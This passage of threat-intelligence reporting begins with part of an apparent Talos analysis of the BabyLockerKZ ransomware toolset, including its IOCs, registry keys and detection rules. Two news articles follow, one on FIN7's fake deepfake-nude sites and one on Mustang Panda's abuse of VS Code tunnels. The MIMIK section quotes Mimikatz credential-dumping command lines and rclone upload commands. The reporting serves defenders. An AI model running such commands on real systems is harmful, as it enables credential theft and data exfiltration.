While most of the tools the attacker uses are publicly available, they also use some tools that are not widely distributed that streamline the attack process by automating the interaction between popular attack tools (e.g., Mimikatz, Invoke-the-hash, PSEXEC, RDP) and by adding convenient functionality and interfaces. One of these tools, called “Checker” used in an attack that deployed BabyLockerKZ, consisted of pivotal characteristics of BabyLockerKZ, the “Checker” tool has a PDB path containing the string “**paid\_memes**”. Pivoting off this string, we identified files on VirusTotal, of which most are BabyLockerKZ samples. We also discovered several other tools, which we’ll outline below.

Checker (E:\\**paid\_memes**\\wmi\_smb\_rdp\_checker\\Release\\checker.pdb) is an app that bundles several other freely available apps and provides a GUI for management of credentials as the attackers proceed with lateral movement. In particular it contains a set of tools:

*   Remote Desktop Plus
*   PSEXEC
*   MIMIKATZ

And a set of scripts based on the Invoke-TheHash tool.

The tool also contains a GUI, as shown below, and a database to store the credentials.

As the image illustrates, the tool can be used to scan IPs for valid credentials using several protocols/techniques (PSEXEC, RDP, SMB and WMI) and is prepared to import data from lists of hosts and some of the tools in the attacker toolset, such as Mimikatz, as well as an advanced port scanner. The tool can also decrypt hashes and offers the convenience of a GUI to store a database of the hosts and respective credentials that have been obtained or verified.

**PTH project**

The PTH (D:\\Projects\\**paid\_memes**\\PTH\\Release\\PTH.pdb) name suggests the pass-the-hash technique to use NTLM hashes to authenticate remotely without having to crack the password. Looking at its resources it embeds:

*   Invoke-SMBClient.ps1
*   Invoke-SMBEnum.ps1
*   Invoke-SMBExec.ps1
*   Invoke-TheHash.ps1
*   Invoke-WMIExec.ps1

These were also used in the checker tool and are part of Invoke-TheHash. According to the author: 

_“Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.”_

MIMIK (D:\\Projects\\**paid\_memes**\\mimik\\Release\\stub\_mimik.pdb) is a wrapper around Mimikatz and rclone that can be used to steal credentials and automatically upload them to an attacker-controlled server. The following image shows the terminal output for the tool.

The following command lines are examples of commands executed via the tool:

*   64.exe privilege::debug sekurlsa::logonPasswords token::elevate lsadump::sam full exit 
*   C:\\Users\\user\\Desktop\\64.exe 64.exe "privilege::debug" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam full" exit 
*   64.exe "privilege::debug" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam full" exit
*   C:\\Users\\user\\Desktop\\rclone.exe rclone rcd --rc-no-auth --bwlimit=30M
*   C:\\Users\\user\\Desktop\\rclone.exe rclone rc operations/stat

**BabyLockerKZ**

BabyLockerKZ is a variant of MedusaLocker that has been around at least since late 2023 and has been analyzed by other researchers, although not specifically called out as a MedusaLocker variant with this name. 

A Cynet blog post on the malware used the name “Hazard” for a MedusaLocker variant (named after the extension used for encrypted files) and mentions the existence of the BabyLockerKZ registry key. 

Another post from Whitehat mentions the existence of PAIDMEMES PUBLIC and PRIVATE registry keys on a MedusaLocker sample. 

This variant has not been given much attention outside of that, though, possibly because it’s highly similar to MedusaLocker or because it uses the same chat and leak sites as MedusaLocker. But there are several notable differences between BabyLockerKZ and MedusaLocker, such as:

*   No {8761ABBD-7F85-42EE-B272-A76179687C63} mutex.
*   No MDSLK reg key.
*   The PAIDMEMES Public and private keys.
*   The BabyLockerKZ run key.

The use of the PAIDMEMES public and private keys is unclear. In their post, Whitehat mentioned that they believe the keys aren’t necessary for the encryption process, as the Linux version doesn’t use them. Further research into the use of these keys might be a topic for another blog post.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

**Open-source Snort Subscriber Rule Set** customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. SIDs for this threat: Snort3 Rules: 1:300998:1:0 Snort2 Rules: 1:63928:1:0, 1:63929:1:0

**ClamAV** detections are also available for this threat:  
Win.Ransomware.MedusaLocker-10035000-1  
Win.Tool.PassTheHash-10034996-0  
Win.Ransomware.MedusaLocker-10035000-0

**Indicators of Compromise**

IOCs for this research can be found at our Github repository here

**BabylockerKZ:**

33a8024395c56fab4564b9baef1645e505e00b0b36bff6fad3aedb666022599a

b8c994e3ed7dcc9080916119ddc315533c129479f508676d7544b82b2e24745f

63eb3d2886d9cb880c9b0d54b94f3e149b3b5b6215a33a0ef63588a09dcd4499

270c3354b3ee2940b499e365eaba143fba9d458f434dc38e663dc0f08e96121e

759b96f44806578cc0836a3a2bf11c8bc553effac72f8d28b94aec78b66be906

**PTH:**

9f066975f1e02b29c7c635280f405c59704ce4f4e06b04e9ac8a7eac22acd3c7

8bc455e5de35290f8a94376357947bd72aaf6f4d452c25a8ef444e037ef76b9f

**Checker:**

d00f7cf6af68ba832b9d364f28411346cfe66fd3b1f5bcac318766add29ff7f0

1f2df15442593b159e45d16a27e4d43d3a9062da212a588ba4c048f214a0b7be

1e9246e6a35731143368eaa0ade4f3cf576d6b22e6090152f6e94f1fa3070651

6ae3a58a78be9c606009c657de4e390538b21ad951e62b6f4d31138e1a75732c

2eddfe711c32ef1668e14a10d00452c83c29e394e17c41f491550a1583c1bcac

**HOHOL1488:**

dc4840a0992b218cbedd5a7ac5c711cb98f1f9e78a8ffdea37c694061dfd34c6

48046fb0e566f5a2d184f84b76d6cadc458762556daed0ae4a3a1200afbefb54

c0c726a23111c220d022fcd01a85f9788249e42baece03f83b6059170453b801

012657c4548d9c98223caa4cc7aa52fc083d6983d42fde16ca3271412e7fe3fe

8edbb1944d94ff91ee917c31590b6d1d5690a52fc153e44355ee9749aa0f4625

364f1b7466d8e4c9f55294ecf1f874c763bcf980c59b0250c613ac366def6aca

5d5d639fdfbf632bb7d9f1bb28731217d09d36078ab5e594baf2a5a41267a5d2

**PDB list:**

d:/projects/paid\_memes/virus/release/stub.pdb

e:/locker/bin/stub\_win\_x64\_encrypter.pdb

i:/locker/bin/stub\_win\_x64\_encrypter.pdb

d:/education/locker/bin/stub\_win\_x64\_encrypter.pdb

d:/education/locker/bin/stub\_win\_x86\_encrypter.pdb

d:/projects/paid\_memes/wmi\_smb\_rdp\_checker/release/checker.pdb

d:/projects/paid\_memes/mimik/release/stub\_mimik.pdb

i:/locker/x64/release/phantom.pdb

d:/projects/paid\_memes/pth/release/pth.pdb

**Registry keys:**

HKEY\_USERS\\%SID%\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKEY\_USERS\\%SID%\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKEY\_CURRENT\_USER\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKEY\_CURRENT\_USER\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKCU\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKCU\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKEY\_CURRENT\_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

HKEY\_USERS\\%SID%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

**Extension names observed being used by BabyLockerKZ samples:**

crypto125

crypto1317

crypto165

crypto41

crypto76

encrypted1

hazard11

hazard21

hazard23

hazard24

hazard25

hazard27

hazard31

hazard38

hazard49

hazard55

hazard56

hazard7

infected

lock2

lock3

lock5

locked9

lockfiles

meduza210

rapid1

rapid10

readtext13

readtext47

readtext49

recovery29

recovery70

virus2

virus3

virus57

**Encryption key BabyLockerKZ:**

PUTINHUILO1337

**MUTEX BabyLockerKZ:**

HOHOL1488

Threat actor believed to be spreading new MedusaLocker variant since 2022

The FIN7 group is mounting a sophisticated malware campaign that spans numerous websites, to lure people with a deepfake tool promising to create nudes out of photos.

Source: Mike via Adobe Stock Photo

The notorious FIN7 threat group is combining artificial intelligence (AI) with social engineering in an aggressive, adult-themed threat campaign that dangles lures for access to technology that can "deepfake" nude photos — all to fool people into installing infostealing malware.

The powerful Russian financial cybercrime group has created at least seven websites that advertise for what's called a "DeepNude Generator," which promises to use deepfake technology transform any photo into a nude representation of the person pictured, according to new research from the threat hunters at Silent Push.

People can either download the generator via the site or sign up for a "free trial," demonstrating the sophistication of the scam. But instead of receiving the tool, they end up downloading malicious payloads such as the stealers Lumma and Redline, which can be used to deliver further malware such as ransomware, the researchers said.

Given the provocative lure, organizations are vulnerable to the campaign, as it may entice  unsuspecting employees to download malicious files. "These files may directly compromise credentials via infostealers or be used for follow-on campaigns that deploy ransomware," according to a blog post about the research.

Meanwhile, FIN7 also continues to promote an existing malvertising campaign that targets corporate users with lures to content by popular brands — including  SAP Concur, Microsoft, Thomson Reuters, and FINVIZ stock screening —  to spread the NetSupport RAT and .MSIX malware, according to Silent Push. The researchers identified a number of active IPs and thus "active new websites" hosting the ploy, which asks people to download a fake "required browser extension," which is actually a malicious payload, to view content related to the brands.

Related:Thousands of DrayTek Routers at Risk From 14 Vulnerabilities

**Fin7 Evolves With the Times**

The DeepNude Generator campaign demonstrates particularly sophisticated thought and planning on the part of FIN7, which developed at least seven dedicated websites URLs —such as aiNude\[.\]ai, easynude\[.\]website, and ai-nude\[.\]cloud — to make it appear convincing.

There is also evidence that FIN7 is employing search engine optimization (SEO) to keep users engaged and to rank their honeypots higher in search results by using footer links to "Best Porn Sites" on its sites. Those links direct victims to other malicious sites dangling the same lure.

Moreover, the group invested effort in creating two website versions for promoting the deepfake tool. The first involves a DeepNude Generator "free download," and the second offers site visitors a DeepNude Generator "free trial," each with a different attack flow.  

Related:Python-Based Malware Slithers Into Systems via Legit VS Code

The first uses "a simple user flow" that uses a "free download" link leading users to a new domain featuring a Dropbox link or another source hosting a malicious payload, according to Silent Push.

The second attack flow prompts users via a "free trial" button to upload an image to test the generator. If this is done, the user is next prompted with a “trial is ready for download” message, with a corresponding pop-up requires the user to answer the question: "The link is for personal use only, do you agree?"

"If the user agrees and clicks 'download,' they are served a .zip file with a malicious payload" that leads to the Lumma Stealer, and which uses a DLL side-loading technique for execution, according to Silent Push.

**Mitigation & Defense Against Fin7**

The two campaigns demonstrate that FIN7 — a cybercrime collective also known as Carbanak, Carbon Spider, Cobalt Group, and Navigator Group that's been active since 2012 — remains an imminent threat despite many attempts by law enforcement to shut it down, or at least significantly disrupt it. It also shows a tenacity on the group's part to evolve with modern technology and psychological tactics to create more sophisticated ways to spread malware, the researchers said.

Related:Dragos Expands ICS Platform With New Acquisition

Indeed, FIN7 has long been known for its savvy combination of malware and social engineering, having mounted a slew of successful, financially motivated attacks against global organizations that have hauled in well over $1.2 billion — and counting — for the criminal enterprise.

To help organizations combat threats from FIN7 and other organized cybercriminal groups, developing indicators of attack based on the group's tactics, techniques, and procedures (TTPs) is one method. Also, training employees to be aware of these increasingly elaborate social engineering tactics that threat groups use, and blocking the download of any unknown any files from the Internet onto a machine connected to a corporate network also can help enterprises avoid compromise by sophisticated threat campaigns.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

AI 'Nude Photo Generator' Delivers Infostealers Instead of Images

The prolific Chinese APT Mustang Panda is the likely culprit behind a sophisticated cyber-espionage attack that sets up persistent remote access to victim machines.

Source: Gerry Pearce via Alamy Stock Photo

A known Chinese advanced persistent threat (APT) group known as Mustang Panda is the likely culprit behind a sophisticated, ongoing cyber-espionage campaign. It starts with a malicious email, and ultimately uses Visual Studio Code (VS Code) to distribute Python-based malware that gives attackers unauthorized and persistent remote access to infected machines.

Researchers from Cyble Research and Intelligence Lab (CRIL) discovered the campaign, which spreads an .lnk file disguised as a legitimate setup file to download a Python distribution package. In reality, it's used to run a malicious Python script. The attack relies upon the use of VS Code, which, if not present on the machine, will be deployed via the installation of the VS Code command line interface (CLI) by the attacker, the researchers noted in analysis published Oct. 2.

"The \[threat actor (TA)\] leverages a \[VS Code\] tool to initiate a remote tunnel and retrieve an activation code, which the TA can use to gain unauthorized remote access to the victim’s machine," according to the blog post about the attack. "This enables the TA to interact with the system, access files, and perform additional malicious activities," which include exfiltrating data and delivering further malware.

Related:Dragos Expands ICS Platform With New Acquisition

Though attribution for the attack is not entirely clear, the researchers found Chinese-language elements and identified tactics, techniques, and procedures (TTPs) in the attack flow that point to the Chinese APT group perhaps best known as Mustang Panda. Cyble tracks it as Stately Taurus, and it also goes by the names Bronze President, Camaro Dragon, Earth Preta, Luminous Moth, and Red Delta.

The attack starts with the execution of the .lnk file, which displays a fake “successful installation” message in Chinese while it silently downloads additional components in the background. Among those is a Python distribution package, which eventually downloads a malicious script. This is the aforementioned Python script, which once executed checks whether VS Code is already installed on the system by checking for the existence of a particular directory. If it is not found, the script then proceeds to download the VS Code command line interface (CLI) from a Microsoft source.

Eventually, this script sets up a task to ensure the persistence of its malicious activities, which include establishing a remote tunnel to give attackers access to the infected machine. When establishing the tunnel, the attackers use VS Code Remote-Tunnels, an extension typically used to connect to a remote machine, such as a desktop PC or virtual machine (VM), via a secure tunnel, according to Cyble. "This enables users to \[remotely\] access the machine from any \[VS Code\] client without the need for SSH," according to the post.

Related:Millions of Kia Vehicles Open to Remote Hacks via License Plate

The attackers also leverage another legitimate entity, the developer repository GitHub, in a strategic way to access files on the infected machine. When setting up the remote tunnel, the script automatically associates it with a GitHub account for authentication, and extracts an activation code to enable further malicious activity later in the attack.

The malware also extracts a list of processes currently running on the victim’s machine and sends them directly to the command-and-control (C2) server, and goes on to gather further sensitive data, such as the system’s language settings, geographical location, computer name, user name, user domain, and details about user privileges. It also collects the names of folders from several directories.

After the attackers receive the exfiltrated data, they can log in for remote access to the device using a GitHub account. "Here, the TA can enter the exfiltrated alphanumeric activation code to gain unauthorized access to the victim’s machine," according to Cyble.

Related:Pwn2Own Auto Offers $500K for Tesla Hacks

"This degree of access not only enables them to browse through the victims’ files but also enables them to execute commands through the terminal," according to the post. "With this control, the TA can perform a variety of actions, such as installing malware, extracting sensitive information, or altering system settings, potentially leading to further exploitation of the victim’s system and data."

**APT Defense Requires Cyber Vigilance**

At the time Cyble published the research, the malicious Python script deployed by the attack had no detections on VirusTotal, which makes it difficult for defenders to detect it through standard security tools, the researchers noted.

To mitigate these kinds of attacks by sophisticated APTs like Mustang Panda, Cyble recommends that organizations use advanced endpoint protection solutions that include behavioral analysis and machine-learning capabilities to detect and block suspicious activities, even those involving legitimate applications like VS Code. Defenders also should review scheduled tasks on all systems regularly to identify unauthorized or unusual entries, which can help detect persistence mechanisms established by threat actors.

Other mitigation activities include setting up training sessions to educate users about the risks of opening suspicious files or links, particularly those related to .lnk files and unknown sources. Organizations also as a general rule should limit user permissions to install software, particularly for tools that can be exploited, like VS Code, as well as use application whitelisting to control which applications can be installed and run on systems.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Tag

#cisco